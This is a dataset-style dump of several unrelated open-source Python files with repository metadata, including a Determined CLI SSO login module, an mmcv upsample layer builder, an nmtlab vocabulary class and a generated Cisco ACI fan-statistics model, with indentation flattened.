from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Callable, List
from urllib.parse import parse_qs, urlparse
from determined.common import api
from determined.common.api import authentication
from determined.common.declarative_argparse import Arg, Cmd
from determined.errors import EnterpriseOnlyError
CLI_REDIRECT_PORT = 49176
def handle_token(master_url: str, token: str) -> None:
tmp_auth = {"Cookie": "auth={token}".format(token=token)}
me = api.get(master_url, "/users/me", headers=tmp_auth, authenticated=False).json()
token_store = authentication.TokenStore(master_url)
token_store.set_token(me["username"], token)
token_store.set_active(me["username"])
print("Authenticated as {}.".format(me["username"]))
def make_handler(master_url: str, close_cb: Callable[[int], None]) -> Any:
class TokenAcceptHandler(BaseHTTPRequestHandler):
def do_GET(self) -> None:
try:
"""Serve a GET request."""
token = parse_qs(urlparse(self.path).query)["token"][0]
handle_token(master_url, token)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"You can close this window now.")
close_cb(0)
except Exception as e:
print("Error authenticating: {}.".format(e))
close_cb(1)
def log_message(self, format: Any, *args: List[Any]) -> None: # noqa: A002
# Silence server logging.
return
return TokenAcceptHandler
def sso(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if not sso_providers:
print("No SSO providers found.")
return
elif not parsed_args.provider:
if len(sso_providers) > 1:
print("Provider must be specified when multiple are available.")
return
matched_provider = sso_providers[0]
else:
matching_providers = [
p for p in sso_providers if p["name"].lower() == parsed_args.provider.lower()
]
if not matching_providers:
ps = ", ".join(p["name"].lower() for p in sso_providers)
print("Provider {} unsupported. (Providers found: {})".format(parsed_args.provider, ps))
return
elif len(matching_providers) > 1:
print("Multiple SSO providers found with name {}.".format(parsed_args.provider))
return
matched_provider = matching_providers[0]
sso_url = matched_provider["sso_url"] + "?relayState=cli"
if not parsed_args.headless:
if webbrowser.open(sso_url):
print(
"Your browser should open and prompt you to sign on;"
" if it did not, please visit {}".format(sso_url)
)
print("Killing this process before signing on will cancel authentication.")
with HTTPServer(
("localhost", CLI_REDIRECT_PORT),
make_handler(parsed_args.master, lambda code: sys.exit(code)),
) as httpd:
return httpd.serve_forever()
print("Failed to open Web Browser. Falling back to --headless CLI mode.")
example_url = f"Example: 'http://localhost:{CLI_REDIRECT_PORT}/?token=v2.public.[long_str]'"
print(
f"Please open this URL in your browser: '{sso_url}'\n"
"After authenticating, copy/paste the localhost URL "
f"from your browser into the prompt.\n{example_url}"
)
token = None
while not token:
user_input_url = getpass(prompt="\n(hidden) localhost URL? ")
try:
token = parse_qs(urlparse(user_input_url).query)["token"][0]
handle_token(parsed_args.master, token)
except (KeyError, IndexError):
print(f"Could not extract token from localhost URL. {example_url}")
def list_providers(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if len(sso_providers) == 0:
print("No SSO providers found.")
return
print("Available providers: " + ", ".join(provider["name"] for provider in sso_providers) + ".")
# fmt: off
args_description = [
Cmd("auth", None, "manage auth", [
Cmd("login", sso, "sign on with an auth provider", [
Arg("-p", "--provider", type=str,
help="auth provider to use (not needed if the Determined master only supports"
" one provider)"),
Arg("--headless", action="store_true", help="force headless cli auth")
]),
Cmd("list-providers", list_providers, "lists the available auth providers", []),
])
] # type: List[Any]
# fmt: on
| [
"[email protected]"
] | |
01f149a939d7ee4687c0ce58037ed05278e16865 | 04142fdda9b3fb29fb7456d5bc3e504985f24cbe | /mmcv/cnn/bricks/upsample.py | 78fb5bf371712d13a72edf5d57151dca8fce6953 | [
"Apache-2.0"
] | permissive | open-mmlab/mmcv | 419e301bbc1d7d45331d67eccfd673f290a796d5 | 6e9ee26718b22961d5c34caca4108413b1b7b3af | refs/heads/main | 2023-08-31T07:08:27.223321 | 2023-08-28T09:02:10 | 2023-08-28T09:02:10 | 145,670,155 | 5,319 | 1,900 | Apache-2.0 | 2023-09-14T02:37:16 | 2018-08-22T07:05:26 | Python | UTF-8 | Python | false | false | 3,299 | py | # Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmengine.model import xavier_init
from mmengine.registry import MODELS
MODELS.register_module('nearest', module=nn.Upsample)
MODELS.register_module('bilinear', module=nn.Upsample)
@MODELS.register_module(name='pixel_shuffle')
class PixelShufflePack(nn.Module):
"""Pixel Shuffle upsample layer.
This module packs `F.pixel_shuffle()` and a nn.Conv2d module together to
achieve a simple upsampling with pixel shuffle.
Args:
in_channels (int): Number of input channels.
out_channels (int): Number of output channels.
scale_factor (int): Upsample ratio.
upsample_kernel (int): Kernel size of the conv layer to expand the
channels.
"""
def __init__(self, in_channels: int, out_channels: int, scale_factor: int,
upsample_kernel: int):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.scale_factor = scale_factor
self.upsample_kernel = upsample_kernel
self.upsample_conv = nn.Conv2d(
self.in_channels,
self.out_channels * scale_factor * scale_factor,
self.upsample_kernel,
padding=(self.upsample_kernel - 1) // 2)
self.init_weights()
def init_weights(self):
xavier_init(self.upsample_conv, distribution='uniform')
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.upsample_conv(x)
x = F.pixel_shuffle(x, self.scale_factor)
return x
def build_upsample_layer(cfg: Dict, *args, **kwargs) -> nn.Module:
"""Build upsample layer.
Args:
cfg (dict): The upsample layer config, which should contain:
- type (str): Layer type.
- scale_factor (int): Upsample ratio, which is not applicable to
deconv.
- layer args: Args needed to instantiate a upsample layer.
args (argument list): Arguments passed to the ``__init__``
method of the corresponding conv layer.
kwargs (keyword arguments): Keyword arguments passed to the
``__init__`` method of the corresponding conv layer.
Returns:
nn.Module: Created upsample layer.
"""
if not isinstance(cfg, dict):
raise TypeError(f'cfg must be a dict, but got {type(cfg)}')
if 'type' not in cfg:
raise KeyError(
f'the cfg dict must contain the key "type", but got {cfg}')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if inspect.isclass(layer_type):
upsample = layer_type
# Switch registry to the target scope. If `upsample` cannot be found
# in the registry, fallback to search `upsample` in the
# mmengine.MODELS.
else:
with MODELS.switch_scope_and_registry(None) as registry:
upsample = registry.get(layer_type)
if upsample is None:
raise KeyError(f'Cannot find {upsample} in registry under scope '
f'name {registry.scope}')
if upsample is nn.Upsample:
cfg_['mode'] = layer_type
layer = upsample(*args, **kwargs, **cfg_)
return layer
| [
"[email protected]"
] | |
697a14ba16fec12bc6822c838c5c9307b462870a | 4d7f743f871860e64f7e1e057b32c8af76fe98ff | /nmtlab/utils/vocab.py | 893b2a2fcfcb1d9146383a199150e541bf465ee5 | [
"MIT"
] | permissive | MarkWuNLP/nmtlab | 8a822c7d2385f885509b9b3e5d039b8fc38562ad | da9c28126336528fc6b85f2d424632ad227a3682 | refs/heads/master | 2022-02-21T14:05:10.523962 | 2019-10-05T08:32:21 | 2019-10-05T08:32:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torchtext.vocab
import pickle
from collections import Counter, defaultdict
DEFAULT_SPECIAL_TOKENS = ["<null>", "<s>", "</s>", "UNK"]
class Vocab(torchtext.vocab.Vocab):
def __init__(self, path=None, unk_token="UNK", picklable=False):
self._unk_token = unk_token
self.itos = []
if picklable:
self.stoi = {}
else:
self.stoi = defaultdict(lambda: 3)
if path:
self.load(path)
def size(self):
return len(self.itos)
def initialize(self, special_tokens=None):
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
self.itos = special_tokens
self._build_vocab_map()
def build(self, txt_path, limit=None, special_tokens=None, char_level=False, field=None, delim="\t"):
vocab_counter = Counter()
for line in open(txt_path):
line = line.strip()
if field is not None:
line = line.split(delim)[field]
if char_level:
words = [w.encode("utf-8") for w in line.decode("utf-8")]
else:
words = line.split(" ")
vocab_counter.update(words)
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
if limit is not None:
final_items = vocab_counter.most_common()[:limit - len(special_tokens)]
else:
final_items = vocab_counter.most_common()
final_items.sort(key=lambda x: (-x[1], x[0]))
final_words = [x[0] for x in final_items]
self.itos = special_tokens + final_words
self._build_vocab_map()
def set_vocab(self, unique_tokens, special_tokens=True):
if special_tokens:
self.itos = DEFAULT_SPECIAL_TOKENS + unique_tokens
else:
self.itos = unique_tokens
self._build_vocab_map()
def add(self, token):
if token not in self.stoi:
self.itos.append(token)
self.stoi[token] = self.itos.index(token)
def save(self, path):
pickle.dump(self.itos, open(path, "wb"))
def load(self, path):
with open(path, "rb") as f:
self.itos = pickle.load(f, encoding='utf-8')
self._build_vocab_map()
def _build_vocab_map(self):
self.stoi.update({tok: i for i, tok in enumerate(self.itos)})
def encode(self, tokens):
return list(map(self.encode_token, tokens))
def encode_token(self, token):
if token in self.stoi:
return self.stoi[token]
else:
return self.stoi[self._unk_token]
def decode(self, indexes):
return list(map(self.decode_token, indexes))
def decode_token(self, index):
return self.itos[index] if index < len(self.itos) else self._unk_token
def contains(self, token):
return token in self.stoi
def get_list(self):
return self.itos
| [
"[email protected]"
] | |
e2666f46d0fa645869fb18bacd4d1c27777b444b | 1c2a0411f9cd24ad3076a7c85baeb7d72cd91c6f | /app_meta/admin.py | 680fe8ae84b8d8946d1f698f52786b3a719551e4 | [] | no_license | eshandas/django_scrapy_project_template | a98b75f5da5a5eeba16fd51be0347ad28432ce79 | 5eb2a2787727569e03f24a9f4bd75add37ddf9bb | refs/heads/master | 2021-01-19T13:06:18.712611 | 2017-04-29T15:48:08 | 2017-04-29T15:48:08 | 88,064,034 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | from django.contrib import admin
from .models import (
KeyValueSetting,
)
admin.site.register(KeyValueSetting)
| [
"[email protected]"
] | |
0ff47b51128d4c3f179c4ff101481282d1461151 | 47fabc7be3769cb1d2d17369efe2048818158477 | /test/test_multinomial_splitting.py | fb9f8105646ef967184adf4470dbd210056f4169 | [
"Apache-2.0"
] | permissive | jpeyhardi/GLM | 35ae651c4aa9771fec63b7c151858e0555a80c07 | 6f0fd763aec2a0ccdef3901b71ed990f20119510 | refs/heads/master | 2021-09-26T08:50:08.938073 | 2018-10-28T13:22:24 | 2018-10-28T13:22:24 | 125,999,551 | 0 | 0 | Apache-2.0 | 2018-03-20T10:21:13 | 2018-03-20T10:21:09 | C++ | UTF-8 | Python | false | false | 1,223 | py | from statiskit import (linalg,
core,
glm)
from statiskit.data import glm as data
import unittest
from nose.plugins.attrib import attr
import math
@attr(linux=True,
osx=True,
win=True,
level=0)
class TestMultinomialSplittingRegression(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Test Multinomial splitting regression construction"""
cls._data = data.load('KN03')
# def test_Fisher_estimation(self):
# """Test negative binomial regression Fisher estimation"""
# data = self._data.extract(explanatories=range(len(self._data.components) - 1),
# response=-1)
# fe = glm.negative_binomial_estimation(algo='Fisher',
# data=data,
# kappa=1.274892646)
# self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.15, places=2)
# # self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.61, places=2)
@classmethod
def tearDownClass(cls):
"""Test Negative Binomial regression deletion"""
del cls._data | [
"[email protected]"
] | |
3e1c5077ecb243ee0421f0cc303f389c21b8d623 | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqpt/fanstats1d.py | ca82eee313ce110542aa85b5984e92415bd750ea | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 18,404 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class FanStats1d(Mo):
"""
A class that represents the most current statistics for fan in a 1 day sampling interval. This class updates every hour.
"""
meta = StatsClassMeta("cobra.model.eqpt.FanStats1d", "fan")
counter = CounterMeta("pwm", CounterCategory.GAUGE, "pwm", "pulse width modulation")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "pwmLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "pwmMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "pwmMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "pwmAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "pwmSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "pwmTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "pwmThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "pwmTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "pwmTr"
meta._counters.append(counter)
counter = CounterMeta("speed", CounterCategory.GAUGE, "rpm", "speed")
counter._propRefs[PropCategory.IMPLICIT_LASTREADING] = "speedLast"
counter._propRefs[PropCategory.IMPLICIT_MIN] = "speedMin"
counter._propRefs[PropCategory.IMPLICIT_MAX] = "speedMax"
counter._propRefs[PropCategory.IMPLICIT_AVG] = "speedAvg"
counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "speedSpct"
counter._propRefs[PropCategory.IMPLICIT_TOTAL] = "speedTtl"
counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "speedThr"
counter._propRefs[PropCategory.IMPLICIT_TREND_BASE] = "speedTrBase"
counter._propRefs[PropCategory.IMPLICIT_TREND] = "speedTr"
meta._counters.append(counter)
meta.moClassName = "eqptFanStats1d"
meta.rnFormat = "CDeqptFanStats1d"
meta.category = MoCategory.STATS_CURRENT
meta.label = "current fan stats in 1 day"
meta.writeAccessMask = 0x80080000000001
meta.readAccessMask = 0x80080000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = True
meta.parentClasses.add("cobra.model.eqpt.Fan")
meta.superClasses.add("cobra.model.eqpt.FanStats")
meta.superClasses.add("cobra.model.stats.Item")
meta.superClasses.add("cobra.model.stats.Curr")
meta.rnPrefixes = [
('CDeqptFanStats1d', False),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR)
prop.label = "Number of Collections During this Interval"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("cnt", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR)
prop.label = "Collection Length"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("lastCollOffset", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "pwmAvg", "pwmAvg", 8243, PropCategory.IMPLICIT_AVG)
prop.label = "pulse width modulation average value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmAvg", prop)
prop = PropMeta("str", "pwmLast", "pwmLast", 8240, PropCategory.IMPLICIT_LASTREADING)
prop.label = "pulse width modulation current value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmLast", prop)
prop = PropMeta("str", "pwmMax", "pwmMax", 8242, PropCategory.IMPLICIT_MAX)
prop.label = "pulse width modulation maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmMax", prop)
prop = PropMeta("str", "pwmMin", "pwmMin", 8241, PropCategory.IMPLICIT_MIN)
prop.label = "pulse width modulation minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmMin", prop)
prop = PropMeta("str", "pwmSpct", "pwmSpct", 8244, PropCategory.IMPLICIT_SUSPECT)
prop.label = "pulse width modulation suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmSpct", prop)
prop = PropMeta("str", "pwmThr", "pwmThr", 8246, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "pulse width modulation thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("pwmThr", prop)
prop = PropMeta("str", "pwmTr", "pwmTr", 8248, PropCategory.IMPLICIT_TREND)
prop.label = "pulse width modulation trend"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTr", prop)
prop = PropMeta("str", "pwmTrBase", "pwmTrBase", 8247, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "pulse width modulation trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTrBase", prop)
prop = PropMeta("str", "pwmTtl", "pwmTtl", 8245, PropCategory.IMPLICIT_TOTAL)
prop.label = "pulse width modulation total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("pwmTtl", prop)
prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR)
prop.label = "Reporting End Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvEnd", prop)
prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR)
prop.label = "Reporting Start Time"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("repIntvStart", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "speedAvg", "speedAvg", 8264, PropCategory.IMPLICIT_AVG)
prop.label = "speed average value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedAvg", prop)
prop = PropMeta("str", "speedLast", "speedLast", 8261, PropCategory.IMPLICIT_LASTREADING)
prop.label = "speed current value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedLast", prop)
prop = PropMeta("str", "speedMax", "speedMax", 8263, PropCategory.IMPLICIT_MAX)
prop.label = "speed maximum value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedMax", prop)
prop = PropMeta("str", "speedMin", "speedMin", 8262, PropCategory.IMPLICIT_MIN)
prop.label = "speed minimum value"
prop.isOper = True
prop.isStats = True
meta.props.add("speedMin", prop)
prop = PropMeta("str", "speedSpct", "speedSpct", 8265, PropCategory.IMPLICIT_SUSPECT)
prop.label = "speed suspect count"
prop.isOper = True
prop.isStats = True
meta.props.add("speedSpct", prop)
prop = PropMeta("str", "speedThr", "speedThr", 8267, PropCategory.IMPLICIT_THRESHOLDED)
prop.label = "speed thresholded flags"
prop.isOper = True
prop.isStats = True
prop.defaultValue = 0
prop.defaultValueStr = "unspecified"
prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552)
prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736)
prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472)
prop._addConstant("avgMajor", "avg-severity-major", 1099511627776)
prop._addConstant("avgMinor", "avg-severity-minor", 549755813888)
prop._addConstant("avgRecovering", "avg-recovering", 34359738368)
prop._addConstant("avgWarn", "avg-severity-warning", 274877906944)
prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192)
prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256)
prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512)
prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096)
prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048)
prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128)
prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024)
prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64)
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2)
prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4)
prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32)
prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16)
prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1)
prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8)
prop._addConstant("maxCrit", "max-severity-critical", 17179869184)
prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912)
prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824)
prop._addConstant("maxMajor", "max-severity-major", 8589934592)
prop._addConstant("maxMinor", "max-severity-minor", 4294967296)
prop._addConstant("maxRecovering", "max-recovering", 268435456)
prop._addConstant("maxWarn", "max-severity-warning", 2147483648)
prop._addConstant("minCrit", "min-severity-critical", 134217728)
prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304)
prop._addConstant("minLow", "min-crossed-low-threshold", 8388608)
prop._addConstant("minMajor", "min-severity-major", 67108864)
prop._addConstant("minMinor", "min-severity-minor", 33554432)
prop._addConstant("minRecovering", "min-recovering", 2097152)
prop._addConstant("minWarn", "min-severity-warning", 16777216)
prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576)
prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768)
prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536)
prop._addConstant("periodicMajor", "periodic-severity-major", 524288)
prop._addConstant("periodicMinor", "periodic-severity-minor", 262144)
prop._addConstant("periodicRecovering", "periodic-recovering", 16384)
prop._addConstant("periodicWarn", "periodic-severity-warning", 131072)
prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968)
prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624)
prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248)
prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984)
prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992)
prop._addConstant("rateRecovering", "rate-recovering", 562949953421312)
prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496)
prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656)
prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208)
prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416)
prop._addConstant("trendMajor", "trend-severity-major", 140737488355328)
prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664)
prop._addConstant("trendRecovering", "trend-recovering", 4398046511104)
prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832)
prop._addConstant("unspecified", None, 0)
meta.props.add("speedThr", prop)
prop = PropMeta("str", "speedTr", "speedTr", 8269, PropCategory.IMPLICIT_TREND)
prop.label = "speed trend"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTr", prop)
prop = PropMeta("str", "speedTrBase", "speedTrBase", 8268, PropCategory.IMPLICIT_TREND_BASE)
prop.label = "speed trend baseline"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTrBase", prop)
prop = PropMeta("str", "speedTtl", "speedTtl", 8266, PropCategory.IMPLICIT_TOTAL)
prop.label = "speed total sum"
prop.isOper = True
prop.isStats = True
meta.props.add("speedTtl", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
# Deployment Meta
meta.deploymentQuery = True
meta.deploymentType = "Ancestor"
meta.deploymentQueryPaths.append(DeploymentPathMeta("EqptSlotToEPg", "EPG", "cobra.model.fv.EPg"))
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
26abe393261a86288211f6bc9fd241563a9b60ce | 119a85a388fe436361530fbb47932e704d749557 | /PEAK-0.5a4dev_r2085/build/lib.macosx-10.6-x86_64-2.7/peak/util/signature.py | dbd8a3fbf7c6e8f609c9564bba8de27bd211ea3d | [
"Python-2.0"
] | permissive | chrisrgunn/cs156project | 014d5b05c6bf0e08ab8bd0dea525057d0e65b9a7 | e5414a37f9793c8b0674695b948482b559b18ea6 | refs/heads/master | 2021-01-19T14:09:49.046539 | 2017-05-24T02:10:29 | 2017-05-24T02:10:29 | 88,128,762 | 0 | 2 | null | 2017-05-04T23:49:09 | 2017-04-13T05:36:10 | Python | UTF-8 | Python | false | false | 1,270 | py | """Crude introspection of call signatures"""
import protocols; from protocols import adapt, Interface
from inspect import getargspec
from types import FunctionType, MethodType
__all__ = 'ISignature', 'getPositionalArgs'
class ISignature(Interface):
# XXX There should be a lot more here than this...
def getPositionalArgs():
"""Return a sequence of positional argument names"""
def getCallable():
"""Return the callable object"""
class FunctionAsSignature(protocols.Adapter):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[FunctionType]
)
def getPositionalArgs(self):
return getargspec(self.subject)[0]
def getCallable(self):
return self.subject
class MethodAsSignature(FunctionAsSignature):
protocols.advise(
instancesProvide=[ISignature],
